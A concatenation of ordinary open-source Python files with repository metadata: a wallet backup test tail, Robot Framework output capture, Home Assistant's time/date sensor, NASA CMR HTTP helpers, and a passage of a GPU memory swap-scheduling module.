self.sync_blocks()
assert_equal(self.nodes[0].getbalance(), balance0)
assert_equal(self.nodes[1].getbalance(), balance1)
assert_equal(self.nodes[2].getbalance(), balance2)
# Backup to source wallet file must fail
sourcePaths = [
os.path.join(self.nodes[0].datadir, self.chain, 'wallets', self.default_wallet_name, self.wallet_data_filename),
os.path.join(self.nodes[0].datadir, self.chain, '.', 'wallets', self.default_wallet_name, self.wallet_data_filename),
os.path.join(self.nodes[0].datadir, self.chain, 'wallets', self.default_wallet_name),
os.path.join(self.nodes[0].datadir, self.chain, 'wallets')]
for sourcePath in sourcePaths:
assert_raises_rpc_error(-4, "backup failed", self.nodes[0].backupwallet, sourcePath)
if __name__ == '__main__':
WalletBackupTest().main()
| 38.722944 | 187 | 0.650755 | ["MIT"] | tcoin01/Agrocoin | test/functional/wallet_backup.py | 8945 | Python
# Copyright 2008-2015 Nokia Solutions and Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
from robot.utils import StringIO
from robot.output import LOGGER
from robot.utils import decode_output, encode_output, JYTHON
class OutputCapturer(object):
def __init__(self, library_import=False):
self._library_import = library_import
self._python_out = PythonCapturer(stdout=True)
self._python_err = PythonCapturer(stdout=False)
self._java_out = JavaCapturer(stdout=True)
self._java_err = JavaCapturer(stdout=False)
def __enter__(self):
if self._library_import:
LOGGER.enable_library_import_logging()
return self
def __exit__(self, exc_type, exc_value, exc_trace):
self._release_and_log()
if self._library_import:
LOGGER.disable_library_import_logging()
return False
def _release_and_log(self):
stdout, stderr = self._release()
if stdout:
LOGGER.log_output(stdout)
if stderr:
LOGGER.log_output(stderr)
sys.__stderr__.write(encode_output(stderr))
def _release(self):
stdout = self._python_out.release() + self._java_out.release()
stderr = self._python_err.release() + self._java_err.release()
return stdout, stderr
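# Usage sketch (not part of the Robot Framework sources): importing code is run
# inside the capturer so stray prints are logged instead of leaking to the
# console. `import_some_library()` is a hypothetical stand-in.
#
#   with OutputCapturer(library_import=True):
#       import_some_library()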
class PythonCapturer(object):
def __init__(self, stdout=True):
if stdout:
self._original = sys.stdout
self._set_stream = self._set_stdout
else:
self._original = sys.stderr
self._set_stream = self._set_stderr
self._stream = StringIO()
self._set_stream(self._stream)
def _set_stdout(self, stream):
sys.stdout = stream
def _set_stderr(self, stream):
sys.stderr = stream
def release(self):
# Original stream must be restored before closing the current
self._set_stream(self._original)
try:
return self._get_value(self._stream)
finally:
self._stream.close()
self._avoid_at_exit_errors(self._stream)
def _get_value(self, stream):
try:
return decode_output(stream.getvalue())
except UnicodeError:
# Error occurs if non-ASCII chars logged both as str and unicode.
stream.buf = decode_output(stream.buf)
stream.buflist = [decode_output(item) for item in stream.buflist]
return stream.getvalue()
def _avoid_at_exit_errors(self, stream):
# Avoid ValueError at program exit when logging module tries to call
# methods of streams it has intercepted that are already closed.
# Which methods are called, and does logging silence possible errors,
# depends on Python/Jython version. For related discussion see
# http://bugs.python.org/issue6333
stream.write = lambda s: None
stream.flush = lambda: None
if not JYTHON:
class JavaCapturer(object):
def __init__(self, stdout=True):
pass
def release(self):
return u''
else:
from java.io import ByteArrayOutputStream, PrintStream
from java.lang import System
class JavaCapturer(object):
def __init__(self, stdout=True):
if stdout:
self._original = System.out
self._set_stream = System.setOut
else:
self._original = System.err
self._set_stream = System.setErr
self._bytes = ByteArrayOutputStream()
self._stream = PrintStream(self._bytes, False, 'UTF-8')
self._set_stream(self._stream)
def release(self):
# Original stream must be restored before closing the current
self._set_stream(self._original)
self._stream.close()
output = self._bytes.toString('UTF-8')
self._bytes.reset()
return output
| 32.686131 | 77 | 0.648504 | ["ECL-2.0", "Apache-2.0"] | moto-timo/robotframework | src/robot/running/outputcapture.py | 4478 | Python
"""A module for useful functions.
:author: Matthew Gidden <matthew.gidden _at_ gmail.com>
"""
import numpy as np
rms = lambda a, axis=None: np.sqrt(np.mean(np.square(a), axis=axis))
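# Example: rms(np.array([3.0, 4.0])) -> ~3.5355, the square root of the mean of the squares.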
| 23.5 | 68 | 0.696809 | [
"BSD-3-Clause"
] | gidden/cyclopts | cyclopts/functionals.py | 188 | Python |
"""
Support for showing the date and the time.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/sensor.time_date/
"""
from datetime import timedelta
import asyncio
import logging
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import CONF_DISPLAY_OPTIONS
from homeassistant.helpers.entity import Entity
import homeassistant.helpers.config_validation as cv
import homeassistant.util.dt as dt_util
_LOGGER = logging.getLogger(__name__)
TIME_STR_FORMAT = '%H:%M'
OPTION_TYPES = {
'time': 'Time',
'date': 'Date',
'date_time': 'Date & Time',
'time_date': 'Time & Date',
'beat': 'Internet Time',
'time_utc': 'Time (UTC)',
}
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_DISPLAY_OPTIONS, default=['time']):
vol.All(cv.ensure_list, [vol.In(OPTION_TYPES)]),
})
@asyncio.coroutine
def async_setup_platform(hass, config, async_add_devices, discovery_info=None):
"""Setup the Time and Date sensor."""
if hass.config.time_zone is None:
_LOGGER.error("Timezone is not set in Home Assistant configuration")
return False
devices = []
for variable in config[CONF_DISPLAY_OPTIONS]:
devices.append(TimeDateSensor(variable))
hass.loop.create_task(async_add_devices(devices, True))
return True
class TimeDateSensor(Entity):
"""Implementation of a Time and Date sensor."""
def __init__(self, option_type):
"""Initialize the sensor."""
self._name = OPTION_TYPES[option_type]
self.type = option_type
self._state = None
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def state(self):
"""Return the state of the sensor."""
return self._state
@property
def icon(self):
"""Icon to use in the frontend, if any."""
if 'date' in self.type and 'time' in self.type:
return 'mdi:calendar-clock'
elif 'date' in self.type:
return 'mdi:calendar'
else:
return 'mdi:clock'
@asyncio.coroutine
def async_update(self):
"""Get the latest data and updates the states."""
time_date = dt_util.utcnow()
time = dt_util.as_local(time_date).strftime(TIME_STR_FORMAT)
time_utc = time_date.strftime(TIME_STR_FORMAT)
date = dt_util.as_local(time_date).date().isoformat()
# Calculate Swatch Internet Time.
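        # One .beat is 1/1000 of a day (86.4 seconds); beats are counted from
        # midnight Biel Mean Time (UTC+1, no DST), hence the one-hour offset below.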
time_bmt = time_date + timedelta(hours=1)
delta = timedelta(
hours=time_bmt.hour, minutes=time_bmt.minute,
seconds=time_bmt.second, microseconds=time_bmt.microsecond)
beat = int((delta.seconds + delta.microseconds / 1000000.0) / 86.4)
if self.type == 'time':
self._state = time
elif self.type == 'date':
self._state = date
elif self.type == 'date_time':
self._state = '{}, {}'.format(date, time)
elif self.type == 'time_date':
self._state = '{}, {}'.format(time, date)
elif self.type == 'time_utc':
self._state = time_utc
elif self.type == 'beat':
self._state = '@{0:03d}'.format(beat)
| 30.40367 | 79 | 0.645142 | [
"MIT"
] | mweinelt/home-assistant | homeassistant/components/sensor/time_date.py | 3,314 | Python |
# NASA EO-Metadata-Tools Python interface for the Common Metadata Repository (CMR)
#
# https://cmr.earthdata.nasa.gov/search/site/docs/search/api.html
#
# Copyright (c) 2020 United States Government as represented by the Administrator
# of the National Aeronautics and Space Administration. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
"""
date 2020-11-05
since 0.0
"""
import json
import logging
import urllib.parse
import urllib.request
import cmr.util.common as common
logging.basicConfig(level = logging.ERROR)
logger = logging.getLogger('cmr.util.network')
def get_local_ip():
"""Rewrite this stub, it is used in code not checked in yet """
return '127.0.0.1'
def value_to_param(key, value):
"""
Convert a key value pair into a URL parameter pair
"""
value = str(value)
encoded_key = urllib.parse.quote(key)
encoded_value = urllib.parse.quote(value)
result = encoded_key + "=" + encoded_value
return result
def expand_parameter_to_parameters(key, parameter):
"""
Convert a list of values into a list of URL parameters
"""
result = []
if isinstance(parameter, list):
for item in parameter:
param = value_to_param(key, item)
result.append(param)
else:
value = str(parameter)
encoded_key = urllib.parse.quote(key)
encoded_value = urllib.parse.quote(value)
result.append(encoded_key + "=" + encoded_value)
return result
def expand_query_to_parameters(query=None):
""" Convert a dictionary to URL parameters """
params = []
if query is None:
return ""
keys = sorted(query.keys())
for key in keys:
value = query[key]
params = params + expand_parameter_to_parameters(key, value)
return "&".join(params)
def apply_headers_to_request(req, headers):
"""Apply a headers to a urllib request object """
if headers is not None and req is not None:
for key in headers:
value = headers[key]
if value is not None and len(value)>0:
req.add_header(key, value)
def transform_results(results, keys_of_interest):
"""
Take a list of results and convert them to a multi valued dictionary. The
real world use case is to take values from a list of collections and pass
them to a granule search.
[{key1:value1},{key1:value2},...] -> {"key1": [value1,value2]} ->
&key1=value1&key1=value2 ( via expand_query_to_parameters() )
"""
params = {}
for item in results:
for key in keys_of_interest:
if key in item:
value = item[key]
if key in params:
params[key].append(value)
else:
params[key] = [value]
return params
def config_to_header(config, source_key, headers, destination_key=None, default=None):
"""
Copy a value in the config into a header dictionary for use by urllib. Written
to reduce boiler plate code
config[key] -> [or default] -> [rename] -> headers[key]
Parameters:
config(dictionary): where to look for values
source_key(string): name if configuration in config
headers(dictionary): where to copy values to
destination_key(string): name of key to save to in headers
default(string): value to use if value can not be found in config
"""
config = common.always(config)
if destination_key is None:
destination_key = source_key
value = config.get(source_key, default)
if destination_key is not None and value is not None:
if headers is None:
headers = {}
headers[destination_key] = value
return headers
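# Example (illustrative): config_to_header({'X-Request-Id': 'abc'}, 'X-Request-Id', {})
# returns {'X-Request-Id': 'abc'}; when the key is absent, `default` is used instead.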
def post(url, body, accept=None, headers=None):
"""
Make a basic HTTP call to CMR using the POST action
Parameters:
url (string): resource to get
body (dictionary): parameters to send, or string if raw text to be sent
accept (string): encoding of the returned data, some form of json is expected
        client_id (string): name of the client making the request (not python or curl)
headers (dictionary): HTTP headers to apply
"""
if isinstance(body, str):
        # JSON string or other such text passed in
data = body
else:
# Do not use the standard url encoder `urllib.parse.urlencode(body)` for
# the body/data because it can not handle repeating values as required
# by CMR. For example: `{'entry_title': ['2', '3']}` must become
# `entry_title=2&entry_title=3` not `entry_title=[2, 3]`
data = expand_query_to_parameters(body)
data = data.encode('utf-8')
logger.debug(" Headers->CMR= %s", headers)
logger.debug(" POST Data= %s", data)
req = urllib.request.Request(url, data)
if accept is not None:
apply_headers_to_request(req, {'Accept': accept})
apply_headers_to_request(req, headers)
try:
#pylint: disable=R1732 # the mock code does not support this in tests
resp = urllib.request.urlopen(req)
response = resp.read()
raw_response = response.decode('utf-8')
if resp.status == 200:
obj_json = json.loads(raw_response)
head_list = {}
for head in resp.getheaders():
head_list[head[0]] = head[1]
if logger.getEffectiveLevel() == logging.DEBUG:
stringified = str(common.mask_dictionary(head_list, ["cmr-token", "authorization"]))
logger.debug(" CMR->Headers = %s", stringified)
obj_json['http-headers'] = head_list
elif resp.status == 204:
obj_json = {}
head_list = {}
for head in resp.getheaders():
head_list[head[0]] = head[1]
obj_json['http-headers'] = head_list
else:
if raw_response.startswith("{") and raw_response.endswith("}"):
return json.loads(raw_response)
return raw_response
return obj_json
except urllib.error.HTTPError as exception:
raw_response = exception.read()
try:
obj_json = json.loads(raw_response)
obj_json['code'] = exception.code
obj_json['reason'] = exception.reason
return obj_json
except json.decoder.JSONDecodeError as err:
return err
return raw_response
def get(url, accept=None, headers=None):
"""
    Make a basic HTTP call to CMR using the GET action
    Parameters:
        url (string): resource to get
        accept (string): encoding of the returned data, some form of json is expected
        client_id (string): name of the client making the request (not python or curl)
        headers (dictionary): HTTP headers to apply
"""
logger.debug(" Headers->CMR= %s", headers)
req = urllib.request.Request(url)
if accept is not None:
apply_headers_to_request(req, {'Accept': accept})
apply_headers_to_request(req, headers)
try:
#pylint: disable=R1732 # the mock code does not support this in tests
resp = urllib.request.urlopen(req)
response = resp.read()
raw_response = response.decode('utf-8')
if resp.status == 200:
obj_json = json.loads(raw_response)
if isinstance(obj_json, list):
data = obj_json
obj_json = {"hits": len(data), "items" : data}
#print (obj_json)
head_list = {}
for head in resp.getheaders():
head_list[head[0]] = head[1]
if logger.getEffectiveLevel() == logging.DEBUG:
stringified = str(common.mask_dictionary(head_list, ["cmr-token", "authorization"]))
logger.debug(" CMR->Headers = %s", stringified)
#obj_json['http-headers'] = head_list
elif resp.status == 204:
obj_json = {}
head_list = {}
for head in resp.getheaders():
head_list[head[0]] = head[1]
obj_json['http-headers'] = head_list
else:
if raw_response.startswith("{") and raw_response.endswith("}"):
return json.loads(raw_response)
return raw_response
return obj_json
except urllib.error.HTTPError as exception:
raw_response = exception.read()
try:
obj_json = json.loads(raw_response)
obj_json['code'] = exception.code
obj_json['reason'] = exception.reason
return obj_json
except json.decoder.JSONDecodeError as err:
return err
return raw_response
| 38.032922 | 100 | 0.62757 | [
"Apache-2.0"
] | nasa/eo-metadata-tools | CMR/python/cmr/util/network.py | 9,242 | Python |
import copy
from enum import Enum
import multiprocessing
import numpy as np
from functools import cmp_to_key
import plotly as py
import plotly.figure_factory as ff
import plotly.graph_objects as go
from plotly.subplots import make_subplots
import plotly
from collections import defaultdict
import os
from pynvml import *
import time
import matplotlib
# matplotlib.use('Agg')
import pickle
import numpy as np
from pynvml import *
from keras.models import Sequential, load_model
from keras.layers import Dense, Conv1D, MaxPool1D, Dropout, Flatten
from matplotlib import cm
from tensorboard.plugins.hparams import keras
from line_profiler import LineProfiler
from typing import List
def get_PCIE_bandwidth():
# if not debug_mod:
# PCIE_bandwidth = nvmlDeviceGetPcieThroughput(handle, NVML_PCIE_UTIL_COUNT) # KB/s => MB/ms
# PCIE_bandwidth /= 1000000
# else:
PCIE_bandwidth = 12
return PCIE_bandwidth
GPU = int(os.environ['CUDA_VISIBLE_DEVICES'])
debug_mod = False
if not debug_mod:
nvmlInit()
handle = nvmlDeviceGetHandleByIndex(GPU)
pyplt = py.offline.plot
PCIE_bandwidth = get_PCIE_bandwidth()
load_list = ['convolution_2d_forward_VALID', 'convolution_backward_filter_2d_VALID', 'convolution_backward_data_2d_VALID',
'convolution_2d_forward_SAME', 'convolution_backward_filter_2d_SAME', 'convolution_backward_data_2d_SAME',
'dropout_forward', 'dropout_backward', 'broadcast_to_NHWC',
'broadcast_to_NCHW', 'reduce_sum_new_NHWC', 'reduce_sum_new_NCHW',
'bn_forward_pre_activation', 'bn_backward_pre_activation', 'activation_forward_relu',
'activation_backward_relu', 'activation_forward_softmax', 'activation_backward_softmax',
'pooling_2d_forward_max', 'pooling_2d_backward_max', 'pooling_2d_forward_mean',
'pooling_2d_backward_mean', 'matrix_multiply', 'matrix_elementwise_multiply_by_const', 'matrix_elementwise_add',
'array_set', 'concat_forward', 'concat_a_backward',
'concat_b_backward', 'sgd_update', 'cross', 'cross_backward', 'adam_mv', 'adam_compute']
optimizer_op = ['AdamOp']
class TaskType(Enum):
swap_out = 0
swap_in = 1
class AccessType(Enum):
output = 0
input = 1
class Tensor:
def __init__(self, tensor_id, job_id, size, shape, recomputation_time, source_tensors=None, is_parameter=False, is_input_or_output=False):
self.tensor_id = tensor_id
self.job_id = job_id
self.size = size
self.swap_time = self.size / PCIE_bandwidth
self.source_tensors = source_tensors if source_tensors is not None else []
self.recomputation_time = recomputation_time
self.recomputation_metric = self.size / self.recomputation_time
self.is_parameter = is_parameter
self.shape = shape
if self.is_parameter or is_input_or_output:
self.in_gpu_at_beginning = True
else:
self.in_gpu_at_beginning = False
def __repr__(self):
return f'tensor_id:{self.tensor_id}, job_id":{self.job_id}, size:{self.size}'
def update_swap_time(self):
PCIE_bandwidth = get_PCIE_bandwidth()
# print(f'PCIE_bandwidth:{PCIE_bandwidth}')
self.swap_time = self.size / PCIE_bandwidth
class TensorAccess:
def __init__(self, tensor, time, run_time, access_type, operation_id, operation_name):
self.tensor = tensor
self.access_id = None
self.start_time = None
self.end_time = None
self.time = time
self.run_time = run_time
self.access_type = access_type
if self.access_type == AccessType.output:
self.end_time = self.time
self.start_time = self.time - self.run_time
else:
self.start_time = self.time
self.end_time = self.time + self.run_time
self.release_flag = False
self.operation_id = operation_id
self.operation_name = operation_name
self.release_for_recomputation = []
def to_tuple(self):
return (self.tensor.tensor_id, self.time)
def __repr__(self):
return f'id={self.tensor.tensor_id}, start_time={self.start_time}, end_time={self.end_time}, time={self.time}, access_type={self.access_type}, release_flag={self.release_flag}'
class SwapTask(object):
'''Date weighted interval'''
def __init__(self, tensor, time, time_cost, task_type: TaskType, front_boundary=None, back_boundary=None):
self.tensor = tensor
self.time_cost = time_cost
self.data_type = np.float64
self.task_type = task_type
self.swap_task_id = None
assert not (front_boundary is None and back_boundary is None)
        # earliest allowed start time
        self.front_boundary = front_boundary
        # latest allowed end time
        self.back_boundary = back_boundary
self.time = time
self.execute_time = None
self.execute_ref = None
self.start_time_ = None
self.end_time_ = None
@property
def start_time(self):
return self.start_time_
@start_time.setter
def start_time(self, value):
self.start_time_ = value
if self.task_type == TaskType.swap_out:
self.time = self.start_time_
@property
def end_time(self):
return self.end_time_
@end_time.setter
def end_time(self, value):
self.end_time_ = value
if self.task_type == TaskType.swap_in:
self.time = self.end_time_
@classmethod
def from_access(cls, access: TensorAccess, weight, task_type, front_boundary=None, back_boundary=None):
        return cls(access.tensor, access.time, access.tensor.swap_time, task_type, front_boundary=front_boundary, back_boundary=back_boundary)
def __repr__(self):
return f'id={self.tensor}, type={self.task_type}, start_time={self.start_time}, end_time={self.end_time}, time={self.time}'
def numpy_ewma_vectorized(data, window):
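    """Vectorized exponentially weighted moving average of `data`, with smoothing factor alpha = 2 / (window + 1)."""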
alpha = 2 / (window + 1.0)
alpha_rev = 1 - alpha
n = data.shape[0]
pows = alpha_rev ** (np.arange(n + 1))
scale_arr = 1 / pows[:-1]
offset = data[0] * pows[1:]
pw0 = alpha * alpha_rev ** (n - 1)
mult = data * pw0 * scale_arr
cumsums = mult.cumsum()
out = offset + cumsums * scale_arr[::-1]
return out
debug_num = 0
def create_model(n):
model = Sequential()
model.add(Dense(units=2048, activation='tanh', input_dim=n))
model.add(Dense(units=2048, activation='tanh'))
model.add(Dense(units=1, activation='relu'))
return model
def load(opname, n):
model = create_model(n)
model.load_weights('model_parameter/' + opname + '_model.hdf5', by_name=True, skip_mismatch=True)
return model
def get_predicted_execution_time(op_name, inputs_of_model, logged_time: list):
return logged_time[0]
def liveness_analysis(tensor_access_list):
global tensor_access_by_tensor
    # generate the liveness analysis results
for job_id in range(len(tensor_access_list)):
tmp = set()
for i in range(len(tensor_access_list[job_id]) - 1, -1, -1):
tensor_access = tensor_access_list[job_id][i]
accesses_of_tensor = tensor_access_by_tensor[tensor_access.tensor.job_id][tensor_access.tensor]
if tensor_access.tensor not in tmp and len(accesses_of_tensor) > 1 and tensor_access == accesses_of_tensor[-1]:
                # parameters are never released
if not tensor_access.tensor.is_parameter:
tmp.add(tensor_access.tensor)
tensor_access.release_flag = True
def is_overlap(task: SwapTask, target: SwapTask):
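    """Return True if the time windows of the two (distinct) swap tasks overlap."""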
return task != target and (
target.start_time < task.end_time < target.end_time or target.start_time < task.start_time < target.end_time or task.start_time < target.end_time < task.end_time or task.start_time < target.start_time < task.end_time)
def get_free_intervals(target_task, swap_schedule, access_of_target_tensor, key=0, asc=True):
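    """
    Return the free time intervals between target_task.front_boundary and
    target_task.back_boundary that are not occupied by already scheduled swap tasks
    or by accesses of the tensor being scheduled; `key` and `asc` control how the
    resulting intervals are sorted.
    """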
target_task.tensor.update_swap_time()
    # list all free time intervals inside the feasible window and sort them
if target_task.back_boundary - target_task.front_boundary < target_task.time_cost:
return []
intervals = []
for task in swap_schedule:
# if target_task.back_boundary < task.start_time:
# continue
# elif task.end_time < target_task.front_boundary:
# break
if target_task.front_boundary <= task.start_time < task.end_time <= target_task.back_boundary:
intervals.append((task.start_time, task.end_time))
elif task.start_time < target_task.front_boundary < task.end_time < target_task.back_boundary:
intervals.append((target_task.front_boundary, task.end_time))
elif target_task.front_boundary < task.start_time < target_task.back_boundary < task.end_time:
intervals.append((task.start_time, target_task.back_boundary))
elif task.start_time < target_task.front_boundary < target_task.back_boundary < task.end_time:
return []
intervals = sorted(intervals, key=lambda x: x[0])
    # merge intervals so that no two intervals overlap
occupied_intervals = []
i = 0
while i < len(intervals):
interval = intervals[i]
l = interval[0]
r = interval[1]
flag = False
while i < len(intervals) - 1 and intervals[i + 1][0] <= r:
r = max(r, intervals[i + 1][1])
flag = True
i += 1
occupied_intervals.append((l, r))
if not flag:
i += 1
not_occupied_intervals = []
s = target_task.front_boundary
for interval in occupied_intervals:
if s < interval[0]:
not_occupied_intervals.append((s, interval[0]))
s = interval[1]
if s < target_task.back_boundary:
not_occupied_intervals.append((s, target_task.back_boundary))
if len(not_occupied_intervals) == 0:
return []
i = 0
j = 0
    # sort intervals by start point
not_occupied_intervals = sorted(not_occupied_intervals, key=lambda x: x[key], reverse=False)
    # prevent the intervals from overlapping with accesses of the tensor being scheduled
while j < len(access_of_target_tensor):
if i >= len(not_occupied_intervals):
break
access = access_of_target_tensor[j]
start, end = not_occupied_intervals[i]
if start < access.start_time < end <= access.end_time:
not_occupied_intervals[i] = (start, access.start_time)
i += 1
elif start < access.start_time < access.end_time < end:
not_occupied_intervals[i] = (start, access.start_time)
not_occupied_intervals.insert(i + 1, (access.end_time, end))
i += 1
j += 1
elif start == access.start_time < end < access.end_time:
not_occupied_intervals.pop(i)
j += 1
elif access.start_time <= start < access.end_time < end:
not_occupied_intervals[i] = (access.end_time, end)
j += 1
elif access.start_time <= start < end <= access.end_time:
not_occupied_intervals.pop(i)
else:
j += 1
    # sort intervals by end point
if not asc:
not_occupied_intervals = sorted(not_occupied_intervals, key=lambda x: x[key], reverse=not asc)
return not_occupied_intervals
def generate_swap_recomputation_release_order(tensor_access_by_tensor, swap_scheduler, recomputations, job_num):
swap_orders = defaultdict(list)
release_orders = defaultdict(list)
recomp_orders = defaultdict(list)
for job_id in range(job_num):
        # sort by id
tensor_accesses = sorted([i for tmp in tensor_access_by_tensor[job_id].values() for i in tmp], key=lambda x: x.tensor.tensor_id)
        # sort by start time
swap_tasks = sorted(swap_scheduler[job_id], key=lambda x: x.start_time)
for i in range(len(swap_tasks)):
swap_tasks[i].swap_task_id = i
releases = []
swaps = []
recomps = []
for access in tensor_accesses:
if access.release_flag:
releases.append((access.operation_id, access.tensor.tensor_id))
release_orders[job_id] = releases
for access in recomputations:
recomps.append((access.operation_id, access.tensor.tensor_id, access.release_for_recomputation))
recomp_orders[job_id] = recomps
for task in swap_tasks:
# if task.task_type==TaskType.swap_out:
# (task_id, node_id(tensor_id), start_time, start_node, move_to_gpu, start_node_type)
ref = task.execute_ref.operation_id
swaps.append([task.tensor.tensor_id, task.execute_time, ref, 0 if task.task_type == TaskType.swap_out else 1, 1, task.start_time])
swap_orders[job_id] = list(map(lambda x: x[:-1], sorted(swaps, key=lambda x: x[-1])))
return release_orders, swap_orders, recomp_orders
def draw_all_task(tensor_access_by_tensor, swap_scheduler, job_num):
for job_id in range(job_num):
tmp = list(tensor_access_by_tensor[job_id].values())
res = []
for sub_list in tmp:
res.extend(sub_list)
draw(sorted(res, key=lambda x: x.start_time), swap_scheduler[job_id])
class MemoryAnalyzer:
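    """Replays tensor accesses and swap tasks on a merged time axis to find the peak GPU memory usage."""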
def __init__(self, tensor_access_list, tensors):
self.tensor_access_list = tensor_access_list
self.tensors = tensors
self.next_swap_tasks_index = 0
def insert_sort(self, list_with_order: list, list_b: list, cmp):
        # ascending order
for obj_b in list_b:
i = 0
mid = 0
j = len(list_with_order) - 1
while i < j:
mid = (i + j) // 2
obj_mid = list_with_order[mid]
flag = cmp(obj_mid, obj_b)
if flag == -1:
# mid<b
if mid == i:
                        # i=mid<=j, mid<b, compare b with j
flag2 = cmp(list_with_order[j], obj_b)
if flag2 == -1:
                            # i=mid<=j<b, insert at position j+1
mid = j
elif flag2 == 1:
                            # i=mid<b<j, insert at position j
mid = j - 1
else:
                            # i=mid<=j=b, insert at position j+1
mid = j
break
i = mid
elif flag == 1:
# b<mid
if mid == j:
                        # i<=mid=j, b<mid, compare i with b
flag2 = cmp(list_with_order[i], obj_b)
if flag2 == -1:
                            # i<b<mid=j, insert at position i+1
mid = i
elif flag2 == 1:
                            # b<i<mid=j, insert at position i
mid = i - 1
else:
                            # i=b<mid=j, insert at position i+1
mid = i
break
j = mid
elif flag == 0:
                    # b==mid, insert at position mid+1
break
list_with_order.insert(mid + 1, obj_b)
return list_with_order
def custom_cmp(self, x, y):
if x.time < y.time:
return -1
elif x.time > y.time:
return 1
else:
if x.start_time < y.start_time:
return -1
elif x.start_time > y.start_time:
return 1
else:
# if isinstance(x,TensorAccess) and isinstance(y, SwapTask):
# return 1
# elif isinstance(x, SwapTask) and isinstance(y, TensorAccess):
# return -1
return 0
def custom_cmp_end_time(self, x, y):
if x.end_time < y.end_time:
return -1
elif x.end_time > y.end_time:
return 1
else:
return 0
def get_max_memory_used(self, swap_tasks, swapped_out_tensor):
delta = len(swap_tasks)
if self.next_swap_tasks_index == 0:
            # initialize the time axis
tmp = copy.copy(self.tensor_access_list)
tmp.extend(swap_tasks)
self.time_axis = sorted(tmp, key=cmp_to_key(self.custom_cmp))
self.end_time_axis = sorted(copy.copy(tmp), key=cmp_to_key(self.custom_cmp_end_time))
# self.last_unused_swap_tasks = copy.copy(swap_tasks)
else:
            # update the time axis
# assert swap_tasks[:self.next_swap_tasks_index] == self.last_unused_swap_tasks
# self.last_unused_swap_tasks = copy.copy(swap_tasks)
swap_tasks = swap_tasks[self.next_swap_tasks_index:]
self.time_axis = self.insert_sort(self.time_axis, swap_tasks, self.custom_cmp)
self.end_time_axis = self.insert_sort(self.end_time_axis, swap_tasks, self.custom_cmp_end_time)
self.index_of_end_time_axis = {self.end_time_axis[i]: i for i in range(len(self.end_time_axis))}
        # compute GPU memory usage
# occupied by handle, cudnn, cuda stream and cudart
memory_used = 0
max_memory_actual = float('-inf')
in_gpu_tensors = set()
max_memory_tensors = set()
last_input_tensor_access = None
max_last_access = None
wait_to_be_released = []
max_time = None
# foot_print = {}
        # first load the inputs x and y and all parameters that were not swapped out into GPU memory, since they have stayed there since the end of the previous iteration
for tensor in self.tensors:
if tensor.in_gpu_at_beginning and tensor not in swapped_out_tensor:
in_gpu_tensors.add(tensor)
memory_used += tensor.size
for time_index, event in enumerate(self.time_axis):
i = len(wait_to_be_released) - 1
while i >= 0:
access = wait_to_be_released[i]
                # if the current time has passed the release time, release the side effects of this access
if event.time >= access.end_time:
wait_to_be_released.pop(i)
memory_used -= access.tensor.size
in_gpu_tensors.remove(access.tensor)
i -= 1
if isinstance(event, TensorAccess):
if event.access_type == AccessType.output:
if event.tensor not in in_gpu_tensors:
                        # new parameters do not take up extra space
if event.operation_name not in optimizer_op:
memory_used += event.tensor.size
in_gpu_tensors.add(event.tensor)
else:
                    # released as soon as it has been used
                    # the input itself does not increase GPU usage; the swap in does
if event.release_flag:
wait_to_be_released.append(event)
else:
last_input_tensor_access = event
elif isinstance(event, SwapTask):
                # search backwards through the time axis sorted by end time
last_event = None
# idx = end_time_axis.index(event)
idx = self.index_of_end_time_axis[event]
for j in range(idx - 1, -1, -1):
if isinstance(self.end_time_axis[j], TensorAccess) and self.end_time_axis[j].end_time <= event.start_time:
last_event = self.end_time_axis[j]
break
if last_event is None:
last_event = self.tensor_access_list[0]
event.execute_ref = last_event
event.execute_time = event.start_time - last_event.end_time
if event.task_type == TaskType.swap_in:
memory_used += event.tensor.size
in_gpu_tensors.add(event.tensor)
else:
memory_used -= event.tensor.size
in_gpu_tensors.remove(event.tensor)
# foot_print[time] = memory_used
if memory_used > max_memory_actual:
                # max_memory_actual is independent of whether the tensors are worth considering; it simply records the peak
max_memory_actual = memory_used
max_memory_tensors = copy.copy(in_gpu_tensors)
max_last_access = last_input_tensor_access
max_time = event.time
self.next_swap_tasks_index = delta
return max_memory_actual, max_memory_tensors, max_last_access, max_time, self.time_axis
def run_global_memory_analysis(swap_tasks, swapped_out_tensor):
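    """Run the per-job memory analyzers and aggregate the peak memory, the tensors alive at the peak, the last input accesses and the peak times."""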
global job_num
global global_memory_analyzer
max_memory = 0
max_memory_tensors = []
last_input_accesses = []
max_time = []
# foot_prints = []
time_axis = []
for job_id in range(job_num):
job_max_memory, job_max_memory_tensors, last_input_access, now_time, t_axis = global_memory_analyzer[job_id].get_max_memory_used(swap_tasks[job_id], swapped_out_tensor)
time_axis.append(t_axis)
# foot_prints.append(foot_print)
max_memory_tensors.extend(job_max_memory_tensors)
last_input_accesses.append(last_input_access)
max_time.append(now_time)
max_memory += job_max_memory
return max_memory, max_memory_tensors, last_input_accesses, max_time, time_axis
def draw(tensor_access_list, swap_schedule):
df = []
id_color = {'OTA': 'rgb(255, 0, 102)', 'ITA': 'rgb(68, 114, 196)', 'Swap In': 'rgb(237, 137, 69)', 'Swap Out': 'rgb(112, 173, 71)'}
for tensor_access in tensor_access_list:
        # input in blue, output in red
df.append(dict(Task=f'tensor_id:{tensor_access.tensor.tensor_id}, size:{tensor_access.tensor.size}', Start=tensor_access.start_time, Finish=tensor_access.end_time,
Resource='OTA' if tensor_access.access_type == AccessType.output else 'ITA'))
for task in swap_schedule:
